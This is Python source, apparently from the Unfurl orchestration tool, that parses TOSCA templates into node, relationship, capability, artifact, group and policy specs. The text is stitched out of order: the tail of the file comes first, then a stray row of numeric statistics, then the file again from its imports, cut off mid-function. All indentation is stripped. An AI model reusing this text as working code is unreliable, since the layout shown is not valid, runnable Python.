def get_workflow(self, workflow):
# XXX need api to get all the workflows with the same name
wfs = self._workflows.get(workflow)
if wfs:
return wfs[0]
else:
return None
def get_repository_path(self, repositoryName, file=""):
baseArtifact = ArtifactSpec(
dict(repository=repositoryName, file=file), spec=self
)
if baseArtifact.repository:
# may resolve repository url to local path (e.g. checkout a remote git repo)
return baseArtifact.get_path()
else:
return None
def get_template(self, name):
if name == "~topology":
return self.topology
elif "~c~" in name:
nodeName, capability = name.split("~c~")
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
return nodeTemplate.get_capability(capability)
elif "~r~" in name:
nodeName, requirement = name.split("~r~")
if nodeName:
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
return nodeTemplate.get_relationship(requirement)
else:
return self.relationshipTemplates.get(name)
elif "~q~" in name:
nodeName, requirement = name.split("~q~")
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
return nodeTemplate.get_requirement(requirement)
elif "~a~" in name:
nodeTemplate = None
nodeName, artifactName = name.split("~a~")
if nodeName:
nodeTemplate = self.nodeTemplates.get(nodeName)
if not nodeTemplate:
return None
artifact = nodeTemplate.artifacts.get(artifactName)
if artifact:
return artifact
# its an anonymous artifact, create inline artifact
tpl = self._get_artifact_spec_from_name(artifactName)
# tpl is a dict or an tosca artifact
return ArtifactSpec(tpl, nodeTemplate, spec=self)
else:
return self.nodeTemplates.get(name)
def _get_artifact_declared_tpl(self, repositoryName, file):
# see if this is declared in a repository node template with the same name
repository = self.nodeTemplates.get(repositoryName)
if repository:
artifact = repository.artifacts.get(file)
if artifact:
return artifact.toscaEntityTemplate.entity_tpl.copy()
return None
def _get_artifact_spec_from_name(self, name):
repository, sep, file = name.partition(":")
file = decode_unfurl_identifier(file)
artifact = self._get_artifact_declared_tpl(repository, file)
if artifact:
return artifact
spec = CommentedMap(file=file)
if repository:
spec["repository"] = repository
return spec
def is_type_name(self, typeName):
return (
typeName in self.template.topology_template.custom_defs
or typeName in EntityType.TOSCA_DEF
)
def find_matching_templates(self, typeName):
for template in self.nodeTemplates.values():
if template.is_compatible_type(typeName):
yield template
def load_instances(self, toscaDef, tpl):
"""
Creates node templates for any instances defined in the spec
.. code-block:: YAML
spec:
instances:
test:
installer: test
installers:
test:
operations:
default:
implementation: TestConfigurator
inputs:"""
node_templates = toscaDef["topology_template"]["node_templates"]
for name, impl in tpl.get("installers", {}).items():
if name not in node_templates:
node_templates[name] = dict(type=self.InstallerType, properties=impl)
else:
raise UnfurlValidationError(
f'can not add installer "{name}", there is already a node template with that name'
)
for name, impl in tpl.get("instances", {}).items():
if name not in node_templates and isinstance(impl, dict):
# add this as a template
if "template" not in impl:
node_templates[name] = self.instance_to_template(impl.copy())
elif isinstance(impl["template"], dict):
node_templates[name] = impl["template"]
if "discovered" in tpl:
# node templates added dynamically by configurators
self.discovered = tpl["discovered"]
for name, impl in tpl["discovered"].items():
if name not in node_templates:
custom_types = impl.pop("custom_types", None)
node_templates[name] = impl
if custom_types:
# XXX check for conflicts, throw error
toscaDef.setdefault("types", CommentedMap()).update(
custom_types
)
def instance_to_template(self, impl):
if "type" not in impl:
impl["type"] = "unfurl.nodes.Default"
installer = impl.pop("install", None)
if installer:
impl["requirements"] = [{"install": installer}]
return impl
def import_connections(self, importedSpec):
# user-declared telationship templates, source and target will be None
for template in importedSpec.template.relationship_templates:
if not template.default_for:
# assume its default relationship template
template.default_for = "ANY"
relTemplate = RelationshipSpec(template, self)
if template.name not in self.relationshipTemplates: # not defined yet
self.relationshipTemplates[template.name] = relTemplate
def find_props(attributes, propertyDefs, matchfn):
if not attributes:
return
for propdef in propertyDefs.values():
if propdef.name not in attributes:
continue
match = matchfn(propdef.entry_schema_entity or propdef.entity)
if not propdef.entry_schema and not propdef.entity.properties:
# it's a simple value type
if match:
yield propdef.name, attributes[propdef.name]
continue
if not propdef.entry_schema:
# it's complex datatype
value = attributes[propdef.name]
if match:
yield propdef.name, value
elif value:
# descend into its properties
for name, v in find_props(value, propdef.entity.properties, matchfn):
yield name, v
continue
properties = propdef.entry_schema_entity.properties
if not match and not properties:
# entries are simple value types and didn't match
continue
value = attributes[propdef.name]
if not value:
continue
if propdef.type == "map":
for key, val in value.items():
if match:
yield key, val
elif properties:
for name, v in find_props(val, properties, matchfn):
yield name, v
elif propdef.type == "list":
for val in value:
if match:
yield None, val
elif properties:
for name, v in find_props(val, properties, matchfn):
yield name, v
# represents a node, capability or relationship
class EntitySpec(ResourceRef):
# XXX need to define __eq__ for spec changes
def __init__(self, toscaNodeTemplate, spec=None):
self.toscaEntityTemplate = toscaNodeTemplate
self.spec = spec
self.name = toscaNodeTemplate.name
if not validate_unfurl_identifier(self.name):
ExceptionCollector.appendException(
UnfurlValidationError(
f'"{self.name}" is not a valid TOSCA template name',
log=True,
)
)
self.type = toscaNodeTemplate.type
self._isReferencedBy = [] # this is referenced by another template or via property traversal
# nodes have both properties and attributes
# as do capability properties and relationships
# but only property values are declared
# XXX user should be able to declare default attribute values
self.propertyDefs = toscaNodeTemplate.get_properties()
self.attributeDefs = {}
# XXX test_helm.py fails without making a deepcopy
# some how chart_values is being modifying outside of a task transaction
self.properties = copy.deepcopy(
CommentedMap(
[(prop.name, prop.value) for prop in self.propertyDefs.values()]
)
)
if toscaNodeTemplate.type_definition:
# add attributes definitions
attrDefs = toscaNodeTemplate.type_definition.get_attributes_def()
self.defaultAttributes = {
prop.name: prop.default
for prop in attrDefs.values()
if prop.name not in ["tosca_id", "state", "tosca_name"]
}
for name, aDef in attrDefs.items():
prop = Property(
name, aDef.default, aDef.schema, toscaNodeTemplate.custom_def
)
self.propertyDefs[name] = prop
self.attributeDefs[name] = prop
# now add any property definitions that haven't been defined yet
# i.e. missing properties without a default and not required
props_def = toscaNodeTemplate.type_definition.get_properties_def()
for pDef in props_def.values():
if pDef.schema and pDef.name not in self.propertyDefs:
self.propertyDefs[pDef.name] = Property(
pDef.name,
pDef.default,
pDef.schema,
toscaNodeTemplate.custom_def,
)
else:
self.defaultAttributes = {}
def _resolve(self, key):
"""Make attributes available to expressions"""
if key in ["name", "type", "uri", "groups", "policies"]:
return getattr(self, key)
raise KeyError(key)
def get_interfaces(self):
return self.toscaEntityTemplate.interfaces
def get_interface_requirements(self):
return self.toscaEntityTemplate.type_definition.get_interface_requirements(
self.toscaEntityTemplate.entity_tpl
)
@property
def groups(self):
if not self.spec:
return
for g in self.spec.groups.values():
if self.name in g.members:
yield g
@property
def policies(self):
return []
def is_compatible_target(self, targetStr):
if self.name == targetStr:
return True
return self.toscaEntityTemplate.is_derived_from(targetStr)
def is_compatible_type(self, typeStr):
return self.toscaEntityTemplate.is_derived_from(typeStr)
@property
def uri(self):
return self.get_uri()
def get_uri(self):
return self.name # XXX
def __repr__(self):
return f"{self.__class__.__name__}('{self.name}')"
@property
def artifacts(self):
return {}
@staticmethod
def get_name_from_artifact_spec(artifact_tpl):
name = artifact_tpl.get(
"name", encode_unfurl_identifier(artifact_tpl.get("file", ""))
)
repository_name = artifact_tpl.get("repository", "")
if repository_name:
return repository_name + "--" + name
else:
return name
def find_or_create_artifact(self, nameOrTpl, path=None, predefined=False):
if not nameOrTpl:
return None
if isinstance(nameOrTpl, six.string_types):
name = nameOrTpl
artifact = self.artifacts.get(nameOrTpl)
if artifact:
return artifact
repositoryName = ""
else:
# inline, anonymous templates can only specify a file and repository
# because ArtifactInstance don't have way to refer to the inline template
# and only encode the file and repository in get_name_from_artifact_spec()
tpl = nameOrTpl
name = nameOrTpl["file"]
repositoryName = nameOrTpl.get("repository")
# if the artifact is defined in a repository, make a copy of it
if not repositoryName:
# see if artifact is declared in local repository
for localStore in self.spec.find_matching_templates(
"unfurl.nodes.LocalRepository"
):
artifact = localStore.artifacts.get(name)
if artifact:
# found, make a inline copy
tpl = artifact.toscaEntityTemplate.entity_tpl.copy()
tpl["name"] = name
tpl["repository"] = localStore.name
break
else:
if predefined and not check_class_registry(name):
logger.warning(f"no artifact named {name} found")
return None
# otherwise name not found, assume it's a file path or URL
tpl = dict(file=name)
else:
# see if this is declared in a repository node template with the same name
artifact_tpl = self.spec._get_artifact_declared_tpl(repositoryName, name)
if artifact_tpl:
tpl = artifact_tpl
tpl["repository"] = repositoryName
# create an anonymous, inline artifact
return ArtifactSpec(tpl, self, path=path)
@property
def abstract(self):
return None
@property
def directives(self):
return []
def find_props(self, attributes, matchfn):
for name, val in find_props(attributes, self.propertyDefs, matchfn):
yield name, val
@property
def base_dir(self):
if self.toscaEntityTemplate._source:
return self.toscaEntityTemplate._source
elif self.spec:
return self.spec.base_dir
else:
return None
def aggregate_only(self):
"The template is only the sum of its parts."
for iDef in self.get_interfaces():
if iDef.interfacename == "Standard":
return False
if iDef.interfacename == "Install" and iDef.name == "discover":
return False
# no implementations found
return True
@property
def required(self):
# if this template is required by another template
for root in _get_roots(self):
if self.spec.substitution_template:
if self.spec.substitution_template is root:
# if don't require if a root is the substitution_mappings
return True
elif 'default' not in root.directives:
# if don't require if this only has defaults templates as a root
return True
return False
def _get_roots(node, seen=None):
# node can reference each other's properties, so we need to handle circular references
if seen is None:
seen = set()
yield node
for parent in node._isReferencedBy:
if parent.name not in seen:
seen.add( node.name )
yield from _get_roots(parent, seen)
class NodeSpec(EntitySpec):
# has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
def __init__(self, template=None, spec=None):
if not template:
template = next(
iter(create_default_topology().topology_template.nodetemplates)
)
spec = ToscaSpec(create_default_topology())
else:
assert spec
EntitySpec.__init__(self, template, spec)
self._capabilities = None
self._requirements = None
self._relationships = []
self._artifacts = None
def _resolve(self, key):
try:
return super()._resolve(key)
except KeyError:
req = self.get_requirement(key)
if not req:
raise KeyError(key)
relationship = req.relationship
# hack!
relationship.toscaEntityTemplate.entity_tpl = list(req.entity_tpl.values())[
0
]
return relationship
@property
def artifacts(self):
if self._artifacts is None:
self._artifacts = {
name: ArtifactSpec(artifact, self)
for name, artifact in self.toscaEntityTemplate.artifacts.items()
}
return self._artifacts
@property
def policies(self):
if not self.spec:
return
for p in self.spec.policies.values():
if p.toscaEntityTemplate.targets_type == "groups":
# the policy has groups as members, see if this node's groups is one of them
if p.members & {g.name for g in self.groups}:
yield p
elif p.toscaEntityTemplate.targets_type == "node_templates":
if self.name in p.members:
yield p
@property
def requirements(self):
if self._requirements is None:
self._requirements = {}
nodeTemplate = self.toscaEntityTemplate
for (relTpl, req, req_type_def) in nodeTemplate.relationships:
name, values = next(iter(req.items()))
reqSpec = RequirementSpec(name, req, self, req_type_def)
if relTpl.target:
nodeSpec = self.spec.get_template(relTpl.target.name)
if nodeSpec:
nodeSpec.add_relationship(reqSpec)
else:
msg = f'Missing target node "{relTpl.target.name}" for requirement "{name}" on "{self.name}"'
ExceptionCollector.appendException(UnfurlValidationError(msg))
self._requirements[name] = reqSpec
return self._requirements
def get_requirement(self, name):
return self.requirements.get(name)
def get_relationship(self, name):
req = self.requirements.get(name)
if not req:
return None
return req.relationship
@property
def relationships(self):
"""
returns a list of RelationshipSpecs that are targeting this node template.
"""
for r in self.toscaEntityTemplate.get_relationship_templates():
assert r.source
# calling requirement property will ensure the RelationshipSpec is properly linked
self.spec.get_template(r.source.name).requirements
return self._get_relationship_specs()
def _get_relationship_specs(self):
if len(self._relationships) != len(
self.toscaEntityTemplate.get_relationship_templates()
):
# get_relationship_templates() is a list of RelationshipTemplates that target the node
rIds = {id(r.toscaEntityTemplate) for r in self._relationships}
for r in self.toscaEntityTemplate.get_relationship_templates():
if id(r) not in rIds and r.capability:
self._relationships.append(RelationshipSpec(r, self.spec, self))
return self._relationships
def get_capability_interfaces(self):
idefs = [r.get_interfaces() for r in self._get_relationship_specs()]
return [i for elem in idefs for i in elem if i.name != "default"]
def get_requirement_interfaces(self):
idefs = [r.get_interfaces() for r in self.requirements.values()]
return [i for elem in idefs for i in elem if i.name != "default"]
@property
def capabilities(self):
if self._capabilities is None:
self._capabilities = {
c.name: CapabilitySpec(self, c)
for c in self.toscaEntityTemplate.get_capabilities_objects()
}
return self._capabilities
def get_capability(self, name):
return self.capabilities.get(name)
def add_relationship(self, reqSpec):
# find the relationship for this requirement:
for relSpec in self._get_relationship_specs():
# the RelationshipTemplate should have had the source node assigned by the tosca parser
# XXX this won't distinguish between more than one relationship between the same two nodes
# to fix this have the RelationshipTemplate remember the name of the requirement
if (
relSpec.toscaEntityTemplate.source.name
== reqSpec.parentNode.toscaEntityTemplate.name
):
assert not reqSpec.relationship or reqSpec.relationship is relSpec, (reqSpec.relationship, relSpec)
reqSpec.relationship = relSpec
assert not relSpec.requirement or relSpec.requirement is reqSpec, (relSpec.requirement, reqSpec)
if not relSpec.requirement:
relSpec.requirement = reqSpec
break
else:
msg = f'relationship not found for requirement "{reqSpec.name}" on "{reqSpec.parentNode}" targeting "{self.name}"'
ExceptionCollector.appendException(UnfurlValidationError(msg))
@property
def abstract(self):
for name in ("select", "substitute"):
if name in self.toscaEntityTemplate.directives:
return name
return None
@property
def directives(self):
return self.toscaEntityTemplate.directives
class RelationshipSpec(EntitySpec):
"""
Links a RequirementSpec to a CapabilitySpec.
"""
def __init__(self, template=None, spec=None, targetNode=None):
# template is a RelationshipTemplate
# It is a full-fledged entity with a name, type, properties, attributes, interfaces, and metadata.
# its connected through target, source, capability
# its RelationshipType has valid_target_types
if not template:
template = (
create_default_topology().topology_template.relationship_templates[0]
)
spec = ToscaSpec(create_default_topology())
else:
assert spec
EntitySpec.__init__(self, template, spec)
self.requirement = None
self.capability = None
if targetNode:
assert targetNode.toscaEntityTemplate is template.target
for c in targetNode.capabilities.values():
if c.toscaEntityTemplate is template.capability:
self.capability = c
break
else:
raise UnfurlError(
"capability %s not found in %s for %s"
% (
template.capability.name,
[c.name for c in targetNode.capabilities.values()],
targetNode.name,
)
)
@property
def source(self):
return self.requirement.parentNode if self.requirement else None
@property
def target(self):
return self.capability.parentNode if self.capability else None
def _resolve(self, key):
try:
return super()._resolve(key)
except KeyError:
if self.capability:
if self.capability.parentNode.is_compatible_target(key):
return self.capability.parentNode
if self.capability.is_compatible_target(key):
return self.capability
raise KeyError(key)
def get_uri(self):
suffix = "~r~" + self.name
return self.source.name + suffix if self.source else suffix
def matches_target(self, capability):
defaultFor = self.toscaEntityTemplate.default_for
if not defaultFor:
return False
nodeTemplate = capability.parentNode.toscaEntityTemplate
if (
defaultFor == self.toscaEntityTemplate.ANY
or defaultFor == nodeTemplate.name
or nodeTemplate.is_derived_from(defaultFor)
or defaultFor == capability.name
or capability.is_derived_from(defaultFor)
):
return self.toscaEntityTemplate.get_matching_capabilities(
nodeTemplate, capability.name
)
return False
class RequirementSpec:
"""
A Requirement shares a Relationship with a Capability.
"""
# XXX need __eq__ since this doesn't derive from EntitySpec
def __init__(self, name, req, parent, type_tpl):
self.source = self.parentNode = parent # NodeSpec
self.spec = parent.spec
self.name = name
self.entity_tpl = req
self.relationship = None
self.type_tpl = type_tpl
# entity_tpl may specify:
# capability (definition name or type name), node (template name or type name), and node_filter,
# relationship (template name or type name or inline relationship template)
# occurrences
def __repr__(self):
return f"{self.__class__.__name__}('{self.name}')"
@property
def artifacts(self):
return self.parentNode.artifacts
def get_uri(self):
return self.parentNode.name + "~q~" + self.name
def get_interfaces(self):
return self.relationship.get_interfaces() if self.relationship else []
def get_nodefilter_properties(self):
# XXX should merge type_tpl with entity_tpl
return get_nodefilters(self.type_tpl, 'properties')
def get_nodefilter_requirements(self):
# XXX should merge type_tpl with entity_tpl
return get_nodefilters(self.type_tpl, "requirements")
def get_nodefilters(entity_tpl, key):
if not isinstance(entity_tpl, dict):
return
nodefilter = entity_tpl.get('node_filter')
if nodefilter and key in nodefilter:
for filter in nodefilter[key]:
name, value = next(iter(filter.items()))
yield name, value
class CapabilitySpec(EntitySpec):
def __init__(self, parent=None, capability=None):
if not parent:
parent = NodeSpec()
capability = parent.toscaEntityTemplate.get_capabilities_objects()[0]
self.parentNode = parent
assert capability
# capabilities.Capability isn't an EntityTemplate but duck types with it
EntitySpec.__init__(self, capability, parent.spec)
self._relationships = None
self._defaultRelationships = None
@property
def parent(self):
return self.parentNode
@property
def artifacts(self):
return self.parentNode.artifacts
def get_interfaces(self):
# capabilities don't have their own interfaces
return self.parentNode.get_interfaces()
def get_uri(self):
# capabilities aren't standalone templates
# this is demanagled by getTemplate()
return self.parentNode.name + "~c~" + self.name
@property
def relationships(self):
return [r for r in self.parentNode.relationships if r.capability is self]
@property
def default_relationships(self):
if self._defaultRelationships is None:
self._defaultRelationships = [
relSpec
for relSpec in self.spec.relationshipTemplates.values()
if relSpec.matches_target(self)
]
return self._defaultRelationships
def get_default_relationships(self, relation=None):
if not relation:
return self.default_relationships
return [
relSpec
for relSpec in self.default_relationships
if relSpec.is_compatible_type(relation)
]
class TopologySpec(EntitySpec):
# has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
def __init__(self, spec=None, inputs=None):
if spec:
self.spec = spec
template = spec.template.topology_template
else:
template = create_default_topology().topology_template
self.spec = ToscaSpec(create_default_topology())
self.spec.topology = self
inputs = inputs or {}
self.toscaEntityTemplate = template
self.name = "~topology"
self.type = "~topology"
self.inputs = {
input.name: inputs.get(input.name, input.default)
for input in template.inputs
}
self.outputs = {output.name: output.value for output in template.outputs}
self.properties = CommentedMap() # XXX implement substitution_mappings
self.defaultAttributes = {}
self.propertyDefs = {}
self.attributeDefs = {}
self.capabilities = []
self._defaultRelationships = None
self._isReferencedBy = []
def get_interfaces(self):
# doesn't have any interfaces
return []
def is_compatible_target(self, targetStr):
if self.name == targetStr:
return True
return False
def is_compatible_type(self, typeStr):
return False
@property
def primary_provider(self):
return self.spec.relationshipTemplates.get("primary_provider")
@property
def default_relationships(self):
if self._defaultRelationships is None:
self._defaultRelationships = [
relSpec
for relSpec in self.spec.relationshipTemplates.values()
if relSpec.toscaEntityTemplate.default_for
]
return self._defaultRelationships
@property
def base_dir(self):
return self.spec.base_dir
def _resolve(self, key):
"""Make attributes available to expressions"""
try:
return super()._resolve(key)
except KeyError:
nodeTemplates = self.spec.nodeTemplates
nodeSpec = nodeTemplates.get(key)
if nodeSpec:
return nodeSpec
matches = [n for n in nodeTemplates.values() if n.is_compatible_type(key)]
if not matches:
raise KeyError(key)
return matches
class Workflow:
def __init__(self, workflow):
self.workflow = workflow
def __str__(self):
return f"Workflow({self.workflow.name})"
def initial_steps(self):
preceeding = set()
for step in self.workflow.steps.values():
preceeding.update(step.on_success + step.on_failure)
return [
step for step in self.workflow.steps.values() if step.name not in preceeding
]
def get_step(self, stepName):
return self.workflow.steps.get(stepName)
def match_step_filter(self, stepName, resource):
step = self.get_step(stepName)
if step:
return all(filter.evaluate(resource.attributes) for filter in step.filter)
return None
def match_preconditions(self, resource):
for precondition in self.workflow.preconditions:
target = resource.root.find_resource(precondition.target)
# XXX if precondition.target_relationship
if not target:
# XXX target can be a group
return False
if not all(
filter.evaluate(target.attributes) for filter in precondition.condition
):
return False
return True
class ArtifactSpec(EntitySpec):
buildin_fields = (
"file",
"repository",
"deploy_path",
"version",
"checksum",
"checksum_algorithm",
"mime_type",
"file_extensions",
)
def __init__(self, artifact_tpl, template=None, spec=None, path=None):
# 3.6.7 Artifact definition p. 84
self.parentNode = template
spec = template.spec if template else spec
if isinstance(artifact_tpl, toscaparser.artifacts.Artifact):
artifact = artifact_tpl
else:
# inline artifact
name = self.get_name_from_artifact_spec(artifact_tpl)
artifact_tpl.pop("name", None) # "name" isn't a valid key
custom_defs = spec and spec.template.topology_template.custom_defs or {}
artifact = toscaparser.artifacts.Artifact(
name, artifact_tpl, custom_defs, path
)
EntitySpec.__init__(self, artifact, spec)
self.repository = (
spec
and artifact.repository
and spec.template.repositories.get(artifact.repository)
or None
)
# map artifacts fields into properties
for prop in self.buildin_fields:
self.defaultAttributes[prop] = getattr(artifact, prop)
def get_uri(self):
if self.parentNode:
return self.parentNode.name + "~a~" + self.name
else:
return "~a~" + self.name
@property
def file(self):
return self.toscaEntityTemplate.file
@property
def base_dir(self):
if self.toscaEntityTemplate._source:
return get_base_dir(self.toscaEntityTemplate._source)
else:
return super().base_dir
def get_path(self, resolver=None):
return self.get_path_and_fragment(resolver)[0]
def get_path_and_fragment(self, resolver=None, tpl=None):
"""
returns path, fragment
"""
tpl = self.spec and self.spec.template.tpl or tpl
if not resolver and self.spec:
resolver = self.spec.template.import_resolver
loader = toscaparser.imports.ImportsLoader(
None, self.base_dir, tpl=tpl, resolver=resolver
)
path, isFile, fragment = loader._resolve_import_template(
None, self.as_import_spec()
)
return path, fragment
def as_import_spec(self):
return dict(file=self.file, repository=self.toscaEntityTemplate.repository)
class GroupSpec(EntitySpec):
def __init__(self, template, spec):
EntitySpec.__init__(self, template, spec)
self.members = template.members
# XXX getNodeTemplates() getInstances(), getChildren()
@property
def member_groups(self):
return [self.spec.groups[m] for m in self.members if m in self.spec.groups]
@property
def policies(self):
if not self.spec:
return
for p in self.spec.policies.values():
if p.toscaEntityTemplate.targets_type == "groups":
if self.name in p.members:
yield p
class PolicySpec(EntitySpec):
def __init__(self, template, spec):
EntitySpec.__init__(self, template, spec)
self.members = set(template.targets_list)
| 37.005944 | 126 | 0.598615 |
import functools
import copy
from .tosca_plugins import TOSCA_VERSION
from .util import UnfurlError, UnfurlValidationError, get_base_dir, check_class_registry
from .eval import Ref, RefContext, map_value
from .result import ResourceRef, ResultsList
from .merge import patch_dict, merge_dicts
from .logs import get_console_log_level
from toscaparser.tosca_template import ToscaTemplate
from toscaparser.properties import Property
from toscaparser.elements.entity_type import EntityType
from toscaparser.elements.statefulentitytype import StatefulEntityType
import toscaparser.workflow
import toscaparser.imports
import toscaparser.artifacts
from toscaparser.common.exception import ExceptionCollector
import six
import logging
import re
from ruamel.yaml.comments import CommentedMap
logger = logging.getLogger("unfurl")
from toscaparser import functions
class RefFunc(functions.Function):
def result(self):
return {self.name: self.args}
def validate(self):
pass
for func in ["eval", "ref", "get_artifact", "has_env", "get_env"]:
functions.function_mappings[func] = RefFunc
toscaIsFunction = functions.is_function
def is_function(function):
return toscaIsFunction(function) or Ref.is_ref(function)
functions.is_function = is_function
def validate_unfurl_identifier(name):
return re.match(r"^[A-Za-z._][A-Za-z0-9._:\-]*$", name) is not None
def encode_unfurl_identifier(name):
def encode(match):
return f"-{ord(match.group(0))}-"
return re.sub(r"[^A-Za-z0-9._:\-]", encode, name)
def decode_unfurl_identifier(name):
def decode(match):
return chr(int(match.group(1)))
return re.sub(r"-([0-9]+)-", decode, name)
def find_standard_interface(op):
if op in StatefulEntityType.interfaces_node_lifecycle_operations:
return "Standard"
elif op in ["check", "discover", "revert"]:
return "Install"
elif op in StatefulEntityType.interfaces_relationship_configure_operations:
return "Configure"
else:
return ""
@functools.lru_cache(maxsize=None)
def create_default_topology():
tpl = dict(
tosca_definitions_version=TOSCA_VERSION,
topology_template=dict(
node_templates={"_default": {"type": "tosca.nodes.Root"}},
relationship_templates={"_default": {"type": "tosca.relationships.Root"}},
),
)
return ToscaTemplate(yaml_dict_tpl=tpl)
def _patch(node, patchsrc, quote=False, tpl=None):
if tpl is None:
tpl = node.toscaEntityTemplate.entity_tpl
ctx = RefContext(node, dict(template=tpl))
ctx.base_dir = getattr(patchsrc, "base_dir", ctx.base_dir)
if quote:
patch = copy.deepcopy(patchsrc)
else:
patch = map_value(patchsrc, ctx)
logger.trace("patching node %s was %s", node.name, tpl)
patched = patch_dict(tpl, patch, True)
logger.trace("patched node %s: now %s", node.name, patched)
return patched
class ToscaSpec:
InstallerType = "unfurl.nodes.Installer"
topology = None
def evaluate_imports(self, toscaDef):
if not toscaDef.get("imports"):
return False
modified = []
for import_tpl in toscaDef["imports"]:
if not isinstance(import_tpl, dict) or "when" not in import_tpl:
modified.append(import_tpl)
continue
match = Ref(import_tpl["when"]).resolve_one(
RefContext(self.topology, trace=0)
)
if match:
logger.debug(
"include import of %s, match found for %s",
import_tpl["file"],
import_tpl["when"],
)
modified.append(import_tpl)
else:
logger.verbose(
"skipping import of %s, no match for %s",
import_tpl["file"],
import_tpl["when"],
)
if len(modified) < len(toscaDef["imports"]):
toscaDef["imports"] = modified
return True
return False
def enforce_filters(self):
patched = False
for nodespec in self.nodeTemplates.values():
for req in nodespec.requirements.values():
for prop, value in req.get_nodefilter_properties():
target = req.relationship and req.relationship.target
if target and isinstance(value, dict) and 'eval' in value:
value.setdefault('vars', {})['SOURCE'] = dict(eval="::"+nodespec.name)
patch = dict(properties={prop: value})
_patch(target, patch, quote=True)
patched = True
for name, value in req.get_nodefilter_requirements():
# annotate the target's requirements
target = req.relationship and req.relationship.target
if target:
matching_target_req = target.requirements.get(name)
_patch(nodespec, value, tpl=matching_target_req.entity_tpl[name])
patched = True
return patched
def _overlay(self, overlays):
def _find_matches():
ExceptionCollector.start()
for expression, _tpl in overlays.items():
try:
match = Ref(expression).resolve_one(
RefContext(self.topology, trace=0)
)
if not match:
continue
if isinstance(match, (list, ResultsList)):
for item in match:
yield (item, _tpl)
else:
yield (match, _tpl)
except:
ExceptionCollector.appendException(
UnfurlValidationError(
f'error evaluating decorator match expression "{expression}"',
log=True,
)
)
matches = list(_find_matches())
return [_patch(*m) for m in matches]
def _parse_template(self, path, inputs, toscaDef, resolver):
self.template = ToscaTemplate(
path=path,
parsed_params=inputs,
yaml_dict_tpl=toscaDef,
import_resolver=resolver,
verify=False,
)
ExceptionCollector.collecting = True # don't stop collecting validation errors
ExceptionCollector.near = ' while instantiating the spec'
self.nodeTemplates = {}
self.installers = {}
self.relationshipTemplates = {}
for template in self.template.nodetemplates:
if not template.type_definition:
continue
nodeTemplate = NodeSpec(template, self)
if template.is_derived_from(self.InstallerType):
self.installers[template.name] = nodeTemplate
self.nodeTemplates[template.name] = nodeTemplate
if hasattr(self.template, "relationship_templates"):
for template in self.template.relationship_templates:
relTemplate = RelationshipSpec(template, self)
self.relationshipTemplates[template.name] = relTemplate
self.load_imported_default_templates()
self.topology = TopologySpec(self, inputs)
substitution_mappings = self.template.topology_template.substitution_mappings
if substitution_mappings and substitution_mappings.node:
self.substitution_template = self.nodeTemplates.get(substitution_mappings.node)
else:
self.substitution_template = None
self.load_workflows()
self.groups = {
g.name: GroupSpec(g, self) for g in self.template.topology_template.groups
}
self.policies = {
p.name: PolicySpec(p, self)
for p in self.template.topology_template.policies
}
ExceptionCollector.collecting = False
def _patch(self, toscaDef, path):
matches = None
decorators = self.load_decorators()
if decorators:
logger.debug("applying decorators %s", decorators)
errorsSoFar = ExceptionCollector.exceptions[:]
matches = self._overlay(decorators)
if ExceptionCollector.exceptionsCaught():
ExceptionCollector.exceptions[:0] = errorsSoFar
message = "\n".join(
ExceptionCollector.getExceptionsReport(
full=(get_console_log_level() < logging.INFO)
)
)
raise UnfurlValidationError(
f"TOSCA validation failed for {path}: \n{message}",
ExceptionCollector.getExceptions(),
)
modified_imports = self.evaluate_imports(toscaDef)
annotated = self.enforce_filters()
return matches or modified_imports or annotated
def __init__(
self, toscaDef, spec=None, path=None, resolver=None, skip_validation=False
):
self.discovered = None
if spec:
inputs = spec.get("inputs")
else:
inputs = None
if isinstance(toscaDef, ToscaTemplate):
self.template = toscaDef
else:
self.template = None
topology_tpl = toscaDef.get("topology_template")
if not topology_tpl:
toscaDef["topology_template"] = dict(
node_templates={}, relationship_templates={}
)
if spec:
self.load_instances(toscaDef, spec)
logger.info("Validating TOSCA template at %s", path)
try:
self._parse_template(path, inputs, toscaDef, resolver)
except:
if not ExceptionCollector.exceptionsCaught() or not self.template or not self.topology:
raise
patched = self._patch(toscaDef, path)
if patched:
self._parse_template(path, inputs, toscaDef, resolver)
if ExceptionCollector.exceptionsCaught():
message = "\n".join(
ExceptionCollector.getExceptionsReport(
full=(get_console_log_level() < logging.INFO)
)
)
if skip_validation:
logger.warning("Found TOSCA validation failures: %s", message)
else:
raise UnfurlValidationError(
f"TOSCA validation failed for {path}: \n{message}",
ExceptionCollector.getExceptions(),
)
@property
def base_dir(self):
if self.template.path is None:
return None
return get_base_dir(self.template.path)
def _get_project_dir(self, home=False):
if self.template.import_resolver:
manifest = self.template.import_resolver.manifest
if manifest.localEnv:
if home:
if manifest.localEnv.homeProject:
return manifest.localEnv.homeProject.projectRoot
elif manifest.localEnv.project:
return manifest.localEnv.project.projectRoot
return None
def add_node_template(self, name, tpl, discovered=True):
custom_types = None
if "custom_types" in tpl:
custom_types = tpl.pop("custom_types")
if custom_types:
self.template.topology_template.custom_defs.update(custom_types)
nodeTemplate = self.template.topology_template.add_template(name, tpl)
nodeSpec = NodeSpec(nodeTemplate, self)
self.nodeTemplates[name] = nodeSpec
if discovered:
if self.discovered is None:
self.discovered = CommentedMap()
self.discovered[name] = tpl
if custom_types:
tpl["custom_types"] = custom_types
return nodeSpec
def load_decorators(self):
decorators = CommentedMap()
for path, import_tpl in self.template.nested_tosca_tpls.items():
imported = import_tpl.get("decorators")
if imported:
decorators = merge_dicts(decorators, imported)
decorators = merge_dicts(decorators, self.template.tpl.get("decorators") or {})
return decorators
def load_imported_default_templates(self):
for name, topology in self.template.nested_topologies.items():
for nodeTemplate in topology.nodetemplates:
if (
"default" in nodeTemplate.directives
and nodeTemplate.name not in self.nodeTemplates
):
nodeSpec = NodeSpec(nodeTemplate, self)
self.nodeTemplates[nodeSpec.name] = nodeSpec
def load_workflows(self):
workflows = {
name: [Workflow(w)]
for name, w in self.template.topology_template.workflows.items()
}
for topology in self.template.nested_topologies.values():
for name, w in topology.workflows.items():
workflows.setdefault(name, []).append(Workflow(w))
self._workflows = workflows
def get_workflow(self, workflow):
wfs = self._workflows.get(workflow)
if wfs:
return wfs[0]
else:
return None
def get_repository_path(self, repositoryName, file=""):
baseArtifact = ArtifactSpec(
